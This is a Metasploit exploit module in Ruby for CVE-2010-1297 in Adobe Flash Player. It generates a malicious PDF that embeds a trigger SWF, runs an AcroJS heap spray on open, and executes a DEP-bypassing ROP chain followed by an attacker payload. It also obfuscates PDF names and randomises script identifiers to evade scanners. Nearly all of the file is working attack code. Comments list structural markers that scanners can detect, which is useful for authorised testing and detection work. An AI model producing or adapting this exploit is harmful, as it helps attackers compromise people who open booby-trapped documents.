Path: blob/master/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb
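##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'zlib'

# File-format exploit module for CVE-2010-1297 (Adobe Flash Player "newfunction").
#
# The generated artifact is a PDF that carries a static SWF (shipped in the
# framework data directory) as a RichMedia annotation and runs an AcroJS heap
# spray from the document's /OpenAction. The sprayed block is a BIB.dll
# ret2lib chain followed by the encoded payload (see make_js).
#
# Structural markers a PDF scanner can key on, all produced by make_pdf:
# a /Catalog whose /OpenAction is a /JavaScript action with a
# [/FlateDecode/ASCIIHexDecode] filtered stream, a /RichMedia annotation with
# an /EmbeddedFile whose name ends in ".swf", PDF names containing random
# "#xx" hex escapes (n_obfu), and an xref table that does not line up with the
# object numbers actually emitted (object 2 is never written).
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  # Module metadata plus the single FILENAME option.
  #
  # @param info [Hash] metadata overrides merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Adobe Flash Player "newfunction" Invalid Pointer Use',
        'Description' => %q{
          This module exploits a vulnerability in the DoABC tag handling within
          versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also
          vulnerable, as are any other applications that may embed Flash player.

          Arbitrary code execution is achieved by embedding a specially crafted Flash
          movie into a PDF document. An AcroJS heap spray is used in order to ensure
          that the memory used by the invalid pointer issue is controlled.

          NOTE: This module uses a similar DEP bypass method to that used within the
          adobe_libtiff module. This method is unlikely to work across various
          Windows versions due a the hardcoded syscall number.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Unknown', # Found being openly exploited
          'jduck' # Metasploit version
        ],
        'References' => [
          ['CVE', '2010-1297'],
          ['OSVDB', '65141'],
          ['BID', '40586'],
          ['URL', 'http://www.adobe.com/support/security/advisories/apsa10-01.html'],
          # For SWF->PDF embedding
          ['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/']
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
          'DisablePayloadHandler' => true
        },
        'Payload' => {
          # The encoded payload is appended to the ROP chain inside the spray
          # block built by make_js; the JS substring arithmetic there assumes
          # the block stays within this budget.
          'Space' => 1000,
          'BadChars' => "\x00",
          'DisableNops' => true
        },
        'Platform' => 'win',
        'Targets' => [
          # Tested OK via Adobe Reader 9.3.0 on Windows XP SP3 (uses flash 10.0.42.34) -jjd
          # Tested OK via Adobe Reader 9.3.1 on Windows XP SP3 (uses flash 10.0.45.2) -jjd
          # Tested OK via Adobe Reader 9.3.2 on Windows XP SP3 (uses flash 10.0.45.2) -jjd
          ['Automatic', {}]
        ],
        'DisclosureDate' => '2010-06-04',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('FILENAME', [true, 'The file name.', 'msf.pdf'])
      ]
    )
  end

  # Entry point: assembles the SWF, the spray script and the PDF, then writes
  # the PDF under datastore['FILENAME'] via the FILEFORMAT mixin.
  def exploit
    swf_data = make_swf
    js_data = make_js(payload.encoded)

    pdf = make_pdf(swf_data, js_data)

    print_status("Creating '#{datastore['FILENAME']}' file...")

    file_create(pdf)
  end

  # Loads the static trigger SWF from the framework data directory.
  #
  # File.binread opens, reads and closes the handle itself, so a failing read
  # can no longer leak the descriptor (the previous open/read/close sequence
  # skipped the close on an exception).
  #
  # @return [String] raw SWF bytes (binary encoding)
  def make_swf
    path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2010-1297.swf')
    File.binread(path)
  end

  # Builds the AcroJS heap-spray script.
  #
  # The sprayed block is stack_data (the BIB.dll chain below) followed by the
  # encoded payload. Per the module description the spray exists so that the
  # memory reached through Flash's invalid pointer is attacker-controlled;
  # 0x0c0c0c0c is used both as the JS "%u0c0c" filler and as literal entries
  # of stack_data.
  #
  # @param encoded_payload [String] payload bytes (payload.encoded)
  # @return [String] JavaScript source with randomized identifier names
  def make_js(encoded_payload)
    # The following executes a ret2lib using BIB.dll
    # The effect is to bypass DEP and execute the shellcode in an indirect way
    stack_data = [
      0xc0c0c0c,
      0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret
      0xcccccccc,
      0x70048ef, # xchg eax,esp / ret
      0x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8]
      0xcccccccc,
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009033, # ret 0x18
      0x7009084, # ret
      0xc0c0c0c,
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7001599, # pop ebp / ret
      0x10124,
      0x70072f7, # pop eax / ret
      0x10104,
      0x70015bb, # pop ecx / ret
      0x1000,
      0x700154d, # mov [eax], ecx / ret
      0x70015bb, # pop ecx / ret
      0x7ffe0300, # -- location of KiFastSystemCall
      0x7007fb2, # mov eax, [ecx] / ret
      0x70015bb, # pop ecx / ret
      0x10011,
      0x700a8ac, # mov [ecx], eax / xor eax,eax / ret
      0x70015bb, # pop ecx / ret
      0x10100,
      0x700a8ac, # mov [ecx], eax / xor eax,eax / ret
      0x70072f7, # pop eax / ret
      0x10011,
      0x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?)
      0x7005c54, # pop esi / add esp,0x14 / ret
      0xffffffff,
      0x10100,
      0x0,
      0x10104,
      0x1000,
      0x40,
      # The next bit effectively copies data from the interleaved stack to the memory
      # pointed to by eax
      # The data copied is:
      # \x5a\x90\x54\x90\x5a\xeb\x15\x58\x8b\x1a\x89\x18\x83\xc0\x04\x83
      # \xc2\x04\x81\xfb\x0c\x0c\x0c\x0c\x75\xee\xeb\x05\xe8\xe6\xff\xff
      # \xff\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xff\xff\xff\x90
      0x700d731, # mov eax, [ebp-0x24] / ret
      0x70015bb, # pop ecx / ret
      0x9054905a,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x5815eb5a,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x18891a8b,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x8304c083,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0xfb8104c2,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0xc0c0c0c,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x5ebee75,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0xffffe6e8,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x909090ff,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x90909090,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x90909090,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x90ffffff,
      0x700154d, # mov [eax], ecx / ret
      0x700d731, # mov eax, [ebp-0x24] / ret
      0x700112f # call eax -- (execute stub to transition to full shellcode)
    ].pack('V*')

    # Every JS identifier is randomized per run so the script has no fixed
    # variable names to match on. (An unused var_start local was dropped.)
    var_unescape = rand_text_alpha(rand(100) + 1)
    var_shellcode = rand_text_alpha(rand(100) + 1)

    # Target length of one spray block; see the first while loop in the JS.
    var_s = 0x10000
    var_c = rand_text_alpha(rand(100) + 1)
    var_b = rand_text_alpha(rand(100) + 1)
    var_d = rand_text_alpha(rand(100) + 1)
    var_3 = rand_text_alpha(rand(100) + 1)
    var_i = rand_text_alpha(rand(100) + 1)
    var_4 = rand_text_alpha(rand(100) + 1)

    payload_buf = ''
    payload_buf << stack_data
    payload_buf << encoded_payload

    escaped_payload = Rex::Text.to_unescape(payload_buf)

    # The script doubles a "%u0c0c" filler string up to var_s chars, splices
    # the payload block into it, doubles that up to 0x80000 chars and keeps
    # 0x1f0 copies alive in an array.
    js = %Q|
      var #{var_unescape} = unescape;
      var #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );
      var #{var_c} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
      while (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};
      #{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);
      #{var_b} += #{var_shellcode};
      #{var_b} += #{var_c};
      #{var_d} = #{var_b}.substring(0, #{var_s}/2);
      while(#{var_d}.length < 0x80000) #{var_d} += #{var_d};
      #{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);
      var #{var_4} = new Array();
      for (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+"s";
    |

    js
  end

  # Returns +count+ random bytes in the 0x80..0xff range.
  #
  # Only referenced from a commented-out line in make_pdf (a PDF binary
  # comment after the header); kept for that purpose.
  #
  # @param count [Integer] number of bytes
  # @return [String]
  def random_non_ascii_string(count)
    result = ''
    count.times { result << (rand(128) + 128).chr }
    result
  end

  # "N 0 obj\n" header for an indirect object.
  #
  # @param id [Integer] object number
  # @return [String]
  def io_def(id)
    format("%d 0 obj\n", id)
  end

  # "N 0 R" indirect reference.
  #
  # @param id [Integer] object number
  # @return [String]
  def io_ref(id)
    format('%d 0 R', id)
  end

  # Randomly rewrites ASCII letters as PDF name hex escapes ("#xx").
  # http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
  #
  # Only letters are candidates: the inputs mix names with delimiters such as
  # "<<", "/", "[" and "(", and "#xx" is only meaningful inside a name token.
  # Iterating with each_char (rather than scan(/./u)) keeps newlines and
  # restricting to [A-Za-z] keeps multibyte characters intact, so the output
  # always decodes back to the input.
  #
  # @param str [String] fragment of PDF syntax
  # @return [String] the fragment with roughly half of its letters escaped
  def n_obfu(str)
    result = ''
    str.each_char do |c|
      if rand(2).zero? && c.match?(/\A[A-Za-z]\z/)
        result << format('#%02x', c.ord)
      else
        result << c
      end
    end
    result
  end

  # ASCIIHex-encodes +str+ with a random run of 1-3 spaces between byte pairs
  # and the ">" end-of-data marker appended.
  #
  # The whitespace is ignored by /ASCIIHexDecode but varies the encoded bytes
  # from run to run.
  #
  # @param str [String] bytes to encode
  # @return [String]
  def ascii_hex_whitespace_encode(str)
    result = ''
    whitespace = ''
    str.each_byte do |b|
      result << whitespace << format('%02x', b)
      whitespace = ' ' * (rand(3) + 1)
    end
    result << '>'
  end

  # Assembles the PDF: catalog -> pages -> page with a RichMedia annotation,
  # an /OpenAction JavaScript action carrying +js+, and +swf+ as an
  # /EmbeddedFile that the annotation references by a random name.
  #
  # Offsets are recorded with bytesize (not length) so the xref stays correct
  # even if a non-ASCII character ever ends up in the document before the
  # binary streams.
  #
  # NOTE(review): object number 2 is never emitted, so the 15 recorded offsets
  # are written as xref entries 1..15 and /Size is 16 while the last object is
  # 16: entries for objects 3..16 are off by one and object 16 has none. The
  # tested Reader versions evidently rebuild the table on mismatch; a
  # spec-strict parser would reject the file, which also makes the mismatch a
  # usable static-analysis signal. Each entry is also 19 bytes ("... n\n")
  # where the spec asks for 20. Left as-is to keep the tested artifact.
  #
  # @param swf [String] raw SWF bytes (already compressed)
  # @param js [String] JavaScript source for the open action
  # @return [String] complete PDF bytes
  def make_pdf(swf, js)
    swf_name = rand_text_alpha(8 + rand(8)) + '.swf'

    xref = []
    eol = "\n"
    endobj = 'endobj' << eol

    # Randomize PDF version?
    pdf = '%PDF-1.5' << eol
    # pdf << "%" << random_non_ascii_string(4) << eol

    # catalog
    xref << pdf.bytesize
    pdf << io_def(1) << n_obfu('<</Type/Catalog')
    pdf << n_obfu('/Pages ') << io_ref(3)
    pdf << n_obfu('/OpenAction ') << io_ref(5)
    pdf << n_obfu('>>')
    pdf << eol << endobj

    # pages array
    xref << pdf.bytesize
    pdf << io_def(3) << n_obfu('<</Type/Pages/Count 1/Kids [') << io_ref(4) << n_obfu(']>>') << eol << endobj

    # page 1
    xref << pdf.bytesize
    pdf << io_def(4) << n_obfu('<</Type/Page/Parent ') << io_ref(3)
    pdf << n_obfu('/Annots [') << io_ref(7) << n_obfu('] ')
    pdf << n_obfu('>>')
    pdf << eol << endobj

    # js action
    xref << pdf.bytesize
    pdf << io_def(5) << n_obfu('<</Type/Action/S/JavaScript/JS ') + io_ref(6) + '>>' << eol << endobj

    # js stream: hex-encoded first, then deflated, so the filter array lists
    # FlateDecode before ASCIIHexDecode (decoders run in array order).
    xref << pdf.bytesize
    compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))
    pdf << io_def(6) << n_obfu(format('<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>', compressed.bytesize)) << eol
    pdf << 'stream' << eol
    pdf << compressed << eol
    pdf << 'endstream' << eol
    pdf << endobj

    # swf annotation object
    xref << pdf.bytesize
    pdf << io_def(7) << n_obfu('<</Type/Annot/Subtype/RichMedia')
    pdf << n_obfu('/Rect [20 20 187 69] ')
    pdf << n_obfu('/RichMediaSettings ') << io_ref(8)
    pdf << n_obfu('/RichMediaContent ') << io_ref(9)
    pdf << n_obfu('/NM (') << swf_name << n_obfu(')')
    pdf << n_obfu('>>')
    pdf << eol << endobj

    # rich media settings
    xref << pdf.bytesize
    pdf << io_def(8)
    pdf << n_obfu('<</Type/RichMediaSettings/Subtype/Flash')
    pdf << n_obfu('/Activation ') << io_ref(10)
    pdf << n_obfu('/Deactivation ') << io_ref(11)
    pdf << n_obfu('>>')
    pdf << eol << endobj

    # rich media content
    xref << pdf.bytesize
    pdf << io_def(9)
    pdf << n_obfu('<</Type/RichMediaContent')
    pdf << n_obfu('/Assets ') << io_ref(12)
    pdf << n_obfu('/Configurations [') << io_ref(14) << ']'
    pdf << n_obfu('>>')
    pdf << eol << endobj

    # rich media activation / deactivation (PO: page open, XD: page closed)
    xref << pdf.bytesize
    pdf << io_def(10)
    pdf << n_obfu('<</Type/RichMediaActivation/Condition/PO>>')
    pdf << eol << endobj

    xref << pdf.bytesize
    pdf << io_def(11)
    pdf << n_obfu('<</Type/RichMediaDeactivation/Condition/XD>>')
    pdf << eol << endobj

    # rich media assets
    xref << pdf.bytesize
    pdf << io_def(12)
    pdf << n_obfu("<</Names [(#{swf_name}) ") << io_ref(13) << n_obfu(']>>')
    pdf << eol << endobj

    # swf embedded file ref
    xref << pdf.bytesize
    pdf << io_def(13)
    pdf << n_obfu('<</Type/Filespec /EF <</F ') << io_ref(16) << n_obfu(">> /F(#{swf_name})>>")
    pdf << eol << endobj

    # rich media configuration
    xref << pdf.bytesize
    pdf << io_def(14)
    pdf << n_obfu('<</Type/RichMediaConfiguration/Subtype/Flash')
    pdf << n_obfu('/Instances [') << io_ref(15) << n_obfu(']>>')
    pdf << eol << endobj

    # rich media instance
    xref << pdf.bytesize
    pdf << io_def(15)
    pdf << n_obfu('<</Type/RichMediaInstance/Subtype/Flash')
    pdf << n_obfu('/Asset ') << io_ref(13)
    pdf << n_obfu('>>')
    pdf << eol << endobj

    # swf stream
    # NOTE: This data is already compressed, no need to compress it again...
    xref << pdf.bytesize
    pdf << io_def(16) << n_obfu(format('<</Type/EmbeddedFile/Length %s>>', swf.bytesize)) << eol
    pdf << 'stream' << eol
    pdf << swf << eol
    pdf << 'endstream' << eol
    pdf << endobj

    # xref table and trailer (see the NOTE(review) in the method comment
    # about the numbering mismatch)
    xref_position = pdf.bytesize
    pdf << 'xref' << eol
    pdf << format('0 %d', xref.length + 1) << eol
    pdf << '0000000000 65535 f' << eol
    xref.each do |offset|
      pdf << format('%010d 00000 n', offset) << eol
    end

    pdf << 'trailer' << eol
    pdf << n_obfu(format('<</Size %d/Root ', xref.length + 1)) << io_ref(1) << '>>' << eol

    pdf << 'startxref' << eol
    pdf << xref_position.to_s << eol

    pdf << '%%EOF' << eol
  end
end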